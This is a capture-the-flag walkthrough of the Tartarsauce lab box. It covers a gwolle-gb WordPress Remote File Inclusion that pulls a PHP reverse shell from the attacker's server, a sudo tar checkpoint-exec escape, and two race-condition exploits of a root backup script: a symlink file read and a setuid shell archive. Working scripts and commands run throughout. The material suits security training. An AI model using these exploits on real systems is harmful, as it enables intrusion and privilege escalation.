This box is about exploiting a vulnerable WordPress plugin that gives us a shell via Remote File Inclusion. From there we escalate to the user onuma by running tar with sudo, and root is obtained by exploiting a custom backup script.

Enumeration

Only port 80 is open, so we start by enumerating the web server. We quickly find some entries in the robots.txt file:

User-agent: *

Disallow: /webservices/tar/tar/source

Disallow: /webservices/monstra-3.0.4

Disallow: /webservices/easy-file-uploader

Disallow: /webservices/phpmyadmin

The only valid directory is the Monstra application. It's just an empty blog page without much information. Surprisingly, we are able to log in with admin:admin at 10.10.10.88/webservices/monstra-3.0.4/admin. Sadly, all functionality has been removed and the whole blog turns out to be a rabbit hole.

Maybe there are more webservices that were not shown in the robots file? After running a directory scan against /webservices we discover a blank and broken WordPress blog at 10.10.10.88/webservices/wp/.



Running wpscan against it reveals some interesting information:

wpscan -u http://10.10.10.88/webservices/wp --enumerate p

The scan finds three installed plugins, two of which appear to be outdated (when the box was released, only one was). Although wpscan doesn't report any useful vulnerabilities, we can find one by searching the internet.

Exploit

The gwolle-gb WordPress plugin has a Remote File Inclusion (RFI) vulnerability:

https://www.exploit-db.com/exploits/38861/

The abspath parameter is not sanitized before being included, so all we have to do is supply a malicious PHP file and we achieve code execution.

As shown in the exploit description, just visit the following URL, replacing [host] with Tartarsauce's address and [hackers_website] with your IP. Since WordPress lives under /webservices/wp on this box, [host] becomes 10.10.10.88/webservices/wp.

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]/
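To avoid typos in the long path, the request can be built with a small helper. This is a minimal sketch, assuming WordPress sits under /webservices/wp (as the directory scan showed) and that our web server listens on port 80; build_rfi_url and trigger_rfi are hypothetical helper names, and 10.10.14.2 below is only a placeholder attacker IP. Because the plugin appends wp-load.php to abspath, the value must end with a slash.

```bash
#!/usr/bin/env bash
# Sketch: build (and optionally fire) the gwolle-gb RFI request for this box.
# Assumptions: WordPress lives under /webservices/wp and our web server is on
# port 80. The plugin appends "wp-load.php" to abspath, so it must end in "/".
# build_rfi_url and trigger_rfi are hypothetical helper names.

build_rfi_url() {
  local target="$1" attacker="$2"
  local plugin="webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php"
  printf 'http://%s/%s?abspath=http://%s/\n' "$target" "$plugin" "$attacker"
}

trigger_rfi() {
  # -m 10 caps the request time, since a spawned reverse shell may keep it open.
  curl -s -m 10 -o /dev/null "$(build_rfi_url "$1" "$2")" || true
}
```

Usage: `trigger_rfi 10.10.10.88 10.10.14.2` once the payload is being served.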



Fire up a web server (python -m SimpleHTTPServer 80, or python3 -m http.server 80 on Python 3), visit the URL, and you will notice that 10.10.10.88 is trying to GET a file called wp-load.php.

All you have to do now is rename your malicious PHP file to wp-load.php and visit the URL again. For example, you could use the reverse shell from http://pentestmonkey.net/tools/web-shells/php-reverse-shell after setting your IP and port in it and starting a listener.
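Preparing wp-load.php from the pentestmonkey shell can be scripted. This is a sketch under the assumption that the downloaded script contains lines of the form `$ip = '127.0.0.1';  // CHANGE THIS` and `$port = 1234;       // CHANGE THIS`; if your copy differs, edit the file by hand instead. make_payload is a hypothetical helper name.

```bash
#!/usr/bin/env bash
# Sketch: turn pentestmonkey's php-reverse-shell.php into the wp-load.php the
# box requests. Assumption: the script contains lines of the form
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
# make_payload is a hypothetical helper name.

make_payload() {
  local src="$1" ip="$2" port="$3" out="${4:-wp-load.php}"
  # [$] matches a literal dollar sign; \1 keeps the "$ip = " / "$port = " prefix.
  sed -e "s/^\([$]ip *= *\)'[^']*'/\1'${ip}'/" \
      -e "s/^\([$]port *= *\)[0-9]*/\1${port}/" \
      "$src" > "$out"
}
```

Usage: `make_payload php-reverse-shell.php 10.10.14.2 4444` (placeholder IP and port), then serve the directory with python3 -m http.server 80 and wait for the connection with nc -lvnp 4444.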

Privilege Escalation



Onuma



We are allowed to run /bin/tar as the user onuma via sudo, so this part is pretty straightforward: the tar program allows for easy code execution.

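tar has a --checkpoint=N option that reports progress every N records, and --checkpoint-action=exec=COMMAND runs a command at each checkpoint. Since tar has to run as onuma, sudo needs the -u flag. Our command would be:

sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh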
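The checkpoint primitive can be tried harmlessly before going through sudo. This sketch archives /dev/null into /dev/null, so nothing is written to disk by tar itself; the only side effect is whatever command is passed in. tar_checkpoint_exec is a hypothetical helper name.

```bash
#!/usr/bin/env bash
# Sketch: show that GNU tar runs an arbitrary command at a checkpoint.
# --checkpoint=1 triggers a checkpoint on every record, and
# --checkpoint-action=exec=CMD passes CMD to /bin/sh each time.
# tar_checkpoint_exec is a hypothetical helper name.

tar_checkpoint_exec() {
  tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="$1"
}
```

Running `tar_checkpoint_exec id` prints the current user's id, which is a quick sanity check of the technique.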

Root

After looking through the system for a while, we find a script called “backuperer”. The files /home/onuma/.mysql_history and /var/backups/onuma_backup_test.txt will point you to it.

Here is the code of /usr/sbin/backuperer:

```bash
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
```

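I found two ways to exploit this script: one lets us read files owned by root, and the other gives us a root shell. Both abuse the same race: onuma creates the archive, which then sits in /var/tmp for 30 seconds before root extracts it, so we can swap in our own archive during that window.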

Method 1 (file read):



The script performs an integrity check by extracting the archive into /var/tmp/check as root and running diff -r between /var/www/html and /var/tmp/check/var/www/html. If there are any differences, they are logged in /var/backups/onuma_backup_error.txt.
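The leak can be reproduced locally without root. In this sketch, "real" stands in for /var/www/html and "check" for /var/tmp/check/var/www/html; demo_diff_leak is a hypothetical helper name. GNU diff -r follows symlinks by default, so when the same file name exists on both sides it prints the differing lines of the symlink's target. A file present on only one side is merely reported as "Only in ...", without its contents.

```bash
#!/usr/bin/env bash
# Sketch: reproduce the integrity_chk leak locally, without root.
# "real" plays /var/www/html and "check" plays /var/tmp/check/var/www/html.
# GNU diff -r dereferences symlinks by default, so the symlink's target is
# compared (and printed) line by line against the real file of the same name.
# demo_diff_leak is a hypothetical helper name.

demo_diff_leak() {
  local base="$1" secret="$2"
  mkdir -p "$base/real" "$base/check"
  echo "User-agent: *" > "$base/real/robots.txt"
  ln -s "$secret" "$base/check/robots.txt"
  diff -r "$base/real" "$base/check"
}
```

The output contains the secret file's lines prefixed with `> `, which is exactly what integrity_chk appends to the error log.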

Since the backuperer script runs as root, diff can follow symlinks into root-owned files, so we are able to get their contents logged:

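Preparation as www-data:

cd /var/tmp

mkdir -p var/www/html

ln -s /root/root.txt var/www/html/robots.txt

The symlink lives in our fake tree and is named after robots.txt, a file that already exists in /var/www/html. diff -r only prints file contents when the same name exists on both sides; a file that exists on just one side is reported as "Only in ...", which would not reveal anything.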



As onuma (backuperer creates the temporary archive as onuma, so only onuma can overwrite it):

cd /var/tmp

tar -czf malicious.tar.gz var

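The script runs every 5 minutes, so we have to wait until the temporary archive pops up in /var/tmp as a hidden file named after a SHA-1 hash (a dot followed by 40 hex characters). From then on we have 30 seconds to overwrite it with our malicious archive, for example with cp malicious.tar.gz /var/tmp/.[sha1].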
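Catching the 30-second window by hand is fiddly, so a small watcher helps. This is a sketch, run as onuma, assuming the temporary name follows the script's `tmpfile=$tmpdir/.$(... | sha1sum ...)` pattern; swap_backup is a hypothetical helper name, and the default 5-second pause (to let onuma's tar finish writing before we overwrite the file) is an arbitrary guess well inside the 30 seconds.

```bash
#!/usr/bin/env bash
# Sketch: wait for backuperer's temporary archive and overwrite it.
# Assumption: the name is a dot plus 40 lowercase hex characters (sha1sum output).
# Run as onuma, who owns that file. swap_backup is a hypothetical helper name.

swap_backup() {
  local payload="$1" dir="${2:-/var/tmp}" delay="${3:-5}"
  local re='^\.[0-9a-f]{40}$' f name
  while :; do
    for f in "$dir"/.*; do
      name=${f##*/}
      if [[ $name =~ $re ]]; then
        # Give onuma's tar a moment to finish writing before overwriting.
        sleep "$delay"
        cp -- "$payload" "$f"
        printf '%s\n' "$f"
        return 0
      fi
    done
    sleep 1
  done
}
```

Usage: start `swap_backup /var/tmp/malicious.tar.gz` before the next run. The payload name has no leading dot, so the script's `rm -rf $tmpdir/.*` cleanup leaves it alone.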

Once the script has run, the diff output logged in /var/backups/onuma_backup_error.txt contains the contents of root.txt.

Method 2 (root shell):



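This method also relies on the integrity_chk function. If the check fails, the script exits before cleaning up, so /var/tmp/check and the extracted files stay around until the next run about 5 minutes later. Because root does the extraction, tar restores the ownership and permissions stored in the archive, including the setuid bit on a root-owned file.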

On attacker box:

(Make sure to perform these commands as root, so that the files in the archive are owned by root.)

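Save the following as shell.c:

```c
#define _GNU_SOURCE   /* exposes setresuid() in <unistd.h> */
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setresuid() */

int main(void) {
    /* Set real, effective and saved UID to 0; works because the binary is setuid root */
    setresuid(0, 0, 0);
    system("/bin/bash");
    return 0;
}
```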

gcc -m32 shell.c -o shell

mkdir var var/www var/www/html

cp shell var/www/html/

chmod 6555 var/www/html/shell

tar -zcvf shell.tar var/


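If you would rather not work as root on the attacker box, GNU tar can write root ownership into the archive headers directly with --owner and --group; root's tar on the victim then restores that owner together with the 6555 mode. This is a sketch under that assumption; build_suid_archive is a hypothetical helper name and $1 is the compiled binary.

```bash
#!/usr/bin/env bash
# Sketch: build the setuid archive without being root on the attacker box.
# --owner/--group record root:root in the headers; a root "tar -x" on the
# victim restores that ownership along with the setuid/setgid bits.
# build_suid_archive is a hypothetical helper name.

build_suid_archive() {
  local bin="$1" out="$2" work
  work=$(mktemp -d)
  mkdir -p "$work/var/www/html"
  cp -- "$bin" "$work/var/www/html/shell"
  chmod 6555 "$work/var/www/html/shell"   # setuid + setgid, r-x for everyone
  tar --owner=root --group=root -C "$work" -zcf "$out" var
  rm -rf -- "$work"
}
```

Usage: `build_suid_archive ./shell shell.tar`, then `tar -tzvf shell.tar` should list var/www/html/shell as `-r-sr-sr-x root/root`.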

On the victim box (as onuma, inside /var/tmp):

wget http://[attacker_ip]/shell.tar

Wait for the next run and overwrite the temporary archive with shell.tar, just like in Method 1.

Once the script is done, the integrity check fails and /var/tmp/check/var/www/html/ is left behind with our setuid binary inside. Running /var/tmp/check/var/www/html/shell gives us a root shell.

That's it for Tartarsauce!